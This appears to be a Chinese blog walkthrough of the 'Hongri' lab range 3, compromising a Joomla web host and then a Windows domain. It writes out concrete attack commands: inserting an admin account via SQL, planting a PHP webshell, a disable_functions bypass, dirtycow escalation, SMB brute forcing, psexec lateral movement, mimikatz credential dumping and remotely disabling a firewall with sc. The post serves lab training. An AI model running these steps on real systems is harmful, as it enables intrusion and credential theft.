首页 > 其他分享 >红日靶场3

红日靶场3

时间:2024-06-17 23:10:22浏览次数:12  
标签:红日 set 网段 发现 192.168 web 靶场 php

环境搭建

拿到靶场有5台机子,配置网段,仅主机模式网段vmnet2网段为192.168.93.0即可,出网网卡设置为桥接即可,点击继续运行即可
注意的是web机的两台linux开启后记得拍快照,web机隔一段时间web服务会出问题

web渗透

主机发现(我的桥接网段是192.168.1.0)
namp -sP 192.168.1.0/24
发现192.168.1.110
image

探测服务

namp -sT -Pn 192.168.1.110

image

访问http
image

没发现啥,指纹识别发现joomla的cms

image

msf搜索可利用的脚本,发现可以识别版本

image

得到版本号3.9.12

image

搜索该版本出现的漏洞发现一远程代码执行漏洞

image

链接
https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Joomla/%EF%BC%88CVE-2020-10238%EF%BC%89Joomla%20%3C%3D%203.9.15%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

根据该文章发现需要admin登录

接下来进行敏感文件和路径扫描

gobuster dir -u http://192.168.1.110 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

image

得到一/administrator路径访问发现是登陆界面

image
尝试默认弱口令登录
admin 123456
失败

image

扫描文件

ffuf -u http://192.168.1.110/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ic -e .asp,.php,.html,.txt,.py

image

image

访问configurarion.php发现啥也没有,试试访问其备份文件configurarion.php~,得到数据库配置得到mysql登录用户密码
testuser cvcvgjASD!@
image

链接mysql

mysql -u testuser -p cvcvgjASD!@ -h 192.168.1.110

查询用户
image

经过一段时间搜索发现一个user表

image
发现administrator用户密码加密后的值
image
尝试hashcat爆破
hashcat -m 3200 -a 0 "\$2y\$10\$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2" /usr/share/wordlists/rockyou.txt

没爆出来

继续搜索可用admin登录的方法,搜索joomla重置密码发现可以

image

image
image

链接

https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn

记得修改表名

点击查看代码
INSERT INTO `am2zu_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin1',
    'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

admin1 secret登录

image

根据前面rce漏洞利用的文章继续利用,在beez3模块下的index.php写入一句话木马

image

根据页面得到url路径/templates/beez3/index.php
image
蚁剑链接

image

执行命令发现没返回,但文件可上传

image

利用蚁剑插件绕过php disable_function

image

上传成功,连接上传的php文件,连接密码仍为一句话密码,但是返回为空

image

搜索发现利用LD_PRELOAD环境变量绕过的更好的方法
链接
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

将x64(x86的不行)的so文件和php文件传到web目录即可,浏览器执行命令

image

访问执行文件成功
image
image

发现反弹啥的不成功

直接信息搜集

image

image

image

得到一个用户和密码

ssh链接,直接命令连失败
image

xshell连成功

内网渗透

image

传提权扫描脚本发现dirtycow

image

直接利用

image

查看ip
ifconfig
image

发现93网段

传fscan扫描其网段

image

发现192.168.93.10(DC)192.168.93.20(test\WIN2008) 192.168.93.30(win7)
并发现开放445等端口

将控制的web机上线到msf

image

添加路由

image

上线win2008,扫描其存在test域
爆破smb密码

点击查看代码
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.20 192.168.93.30 192.168.93.10

我字典的问题没爆出来
得到密码123qwe!ASD

域横向

psexec横向
dc没成功,上线2008

点击查看代码
use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp

set smbuser administrator

set smbpass 123qwe!ASD

set rhosts 192.168.93.20
run

image

传mimikatz抓取密码
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full"

image

psexec横向域控没成功

建立与dc的ipc链接
net use \\192.168.93.10\ipc$ zxcASDqw123!! /user:test\administrator

sc关闭防火墙

点击查看代码
sc \\192.168.93.10 create aaa binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.10 start aaa

image

image

psexec横向

image
image

拿下域控

image

image

到此结束,还可用计划任务等横向

标签:红日,set,网段,发现,192.168,web,靶场,php
From: https://www.cnblogs.com/v3n0m-cccccc/p/18253412

相关文章

  • joker靶场
    jokerifconfig看ip先进个rootnmap扫一下,nmap192.168.1.0/24扫到了这个开了80端口和8080端口的网段御剑扫一下目录secret.txt/phpinfo.php可以看到操作系统为Linux的ubuntu,还能看到一些别的配置文件,中间件等信息既然开了8080就去看看啥也没有,看看8080(这里用的文......
  • 红日复现为什么失败之struct漏洞复现
    struts2漏洞一、指纹识别s2的url路径组成(详见struts.xml配置文件):name工程名+namespace命名空间+atcion名称+extends拓展名部署在根目录下,工程名可为空;当然namespace名称也可设置为空;拓展名也可设置为空。方法一(1)url会有.action或.do后缀文件名(eg:http://192.168.xx.xx/integ......
  • [罗嗦的详解]BURP官方靶场Lab: SSRF with filter bypass via open redirection vulner
    参考视频:官方把场下的俩个视频https://youtu.be/iF1BPVTqM10抓取checkstore按钮的POST请求,请求体:stockApi=/product/stock/check?productId=3&storeId=1nextstore按钮的get请求:GET/product/nextProduct?currentProductId=3&path=/product?productId=4HTTP/2path参......
  • 基于phpstudy的Pikachu靶场搭建(有手就会)
    目录一、phpstudy和pikachu源码下载地址二、phpstudy创建网站,网站根目录设置为pikachu的源码文件夹1、将pikachu_master(pikachu源码文件夹)放到phpstudy的WWW目录下2、打开phpstudy,创建pikachu靶场网站三、配置pikachu靶场四、用phpstudy的mysql连接pikachu靶场的数据库......
  • 以sqlilabs靶场为例,讲解SQL注入攻击原理【54-65关】
    【Less-54】与前面的题目不同是,这里只能提交10次,一旦提交超过十次,数据会重新刷新,所有的步骤需要重来一次。解题步骤:根据测试,使用的是单引号闭合。#判断字段的数量?id=1'orderby3--aaa#获取数据库的名字?id=-1'unionselect1,2,database()--aa#获取数据......
  • 红日4攻略失败
    红日4靶场复现一、环境搭建1.网络配置略过,注意将wireshark置于仅主机网段方便抓包2.配置docker环境,搭建s2、tomcat、phpmyadmin#如图一cd/home/ubuntu/Desktop/vulhub/struts2/s2-045sudodocker-composeup-dcd/home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/......
  • vuInhub靶场实战系列--Kioptrix Level #3
    免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。目录免责声明前言一、环境配置1.1靶场信息1.2靶场配置二、信息收集2.1主机发现2.1.1netdiscover2.1.2arp-scan主机扫描2.2端口扫描2.3指纹识别2.......
  • csrf与xss差别 别在弄乱了 直接靶场实操pikachu的csrf题
    我们现在来说说这2个之间的关系,因为昨天的我也没有弄清楚这2者的关系,总感觉迷迷糊糊的。xss这个漏洞是大家并不怎么陌生,导致xss漏洞的产生是服务器没有对用户提交数据过滤不严格,导致浏览器把用户输入的当作js代码返回客户端进行执行,这样就导致了攻击。xss(跨站脚本攻击)可以......
  • sqli-labs 靶场闯关基础准备、学习步骤、SQL注入类型,常用基本函数、获取数据库元数据
    Sqli-labs的主要作用是帮助用户学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。它提供了多个不同的漏洞场景,每个场景都代表了一个特定类型的SQL注入漏洞。用户可以通过攻击这些场景来学习和实践漏洞利用技术,以及相应的修复和防御措施。Sqli-labs......
  • sqli-labs 靶场 less-1、2、3、4 第一关至第四关: 判断闭合方式,order by判断字段数,是否
    SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。Less1SQLIDUMBSERIES-11.判断闭合方式:在参数后面加\的方法判断闭合,\后面的符号就是闭合符号。在第一关,闭合方式通......